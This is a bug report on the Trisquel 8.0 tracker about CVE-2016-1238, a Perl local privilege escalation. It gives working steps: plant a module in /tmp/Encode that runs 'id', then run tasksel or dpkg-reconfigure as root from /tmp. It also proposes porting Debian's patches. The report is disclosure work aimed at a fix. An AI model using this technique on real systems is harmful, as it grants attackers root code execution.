CVE-2016-1238 (local privilege escalation) is easily exploitable but it is not addressed in Trisquel 8.0

Projet:Trisquel
Version:8.0
Composant:Packages
Catégorie:Rapporter un bogue
Priorité:critical
Attribué:Non assigné
Statut:patch (needs work)
Description

Steps to reproduce:

1. Execute the following command:

mkdir /tmp/Encode; echo "system(q(id)); 1;" > /tmp/Encode/ConfigLocal.pm

2. Change the current working directory to /tmp:

cd /tmp

3. Run dpkg-reconfigure, adduser, deluser or tasksel as root:

sudo tasksel

Expected result:
/tmp/Encode/ConfigLocal.pm should not be executed.

Observed result:
You will see a line containing output of the "id" command: "uid=0(root) gid=0(root) groups=0(root)".

Trisquel 8.0 and earlier versions are affected, the upcoming Trisquel 9 is not affected.

Canonical has decided to ignore this vulnerability in Ubuntu 16.04, cf.: https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1238.html, https://bugs.launchpad.net/ubuntu/+source/perl/+bug/1705145. This vulnerability has been mitigated in Debian "jessie", I propose that their patches for Perl 5.20 should be ported to Perl 5.22 (this version is in Trisquel 8.0).

External links:
https://security-tracker.debian.org/tracker/CVE-2016-1238
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1238
https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1238.html
https://bugs.launchpad.net/ubuntu/+source/perl/+bug/1705145
https://sources.debian.org/src/perl/5.20.2-3+deb8u11/debian/patches/debian/CVE-2016-1238/
https://sources.debian.org/src/perl/5.20.2-3+deb8u11/debian/patches/fixes/CVE-2016-1238/